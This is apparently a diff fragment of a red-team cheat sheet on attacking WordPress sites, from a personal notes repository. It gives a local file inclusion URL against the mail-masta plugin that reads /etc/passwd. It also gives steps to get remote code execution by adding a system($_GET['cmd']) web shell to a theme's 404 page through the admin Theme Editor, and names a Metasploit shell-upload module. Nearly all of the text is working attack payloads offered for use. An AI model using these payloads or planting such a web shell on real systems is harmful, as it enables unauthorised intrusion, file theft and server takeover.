lw8192/Red-Team-Rising/Web/CMS.md

     /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

 RCE via Theme Editor using Admin Creds
 Login, select Appearance on the side panel and select Theme Editor to modify the PHP source code.
 Select an inactive theme to avod breaking the main theme.
+Add to below to theme 404 page then access it (probably) here: http://10.10.10.10/wordpress/wp-content/themes/twentytwenty/404.php

+    system($_GET['cmd']);
-    exploit/unix/webapp/wp_admin_shell_upload    #metasploit exploit
+    exploit/unix/webapp/wp_admin_shell_upload    #or use this metasploit exploit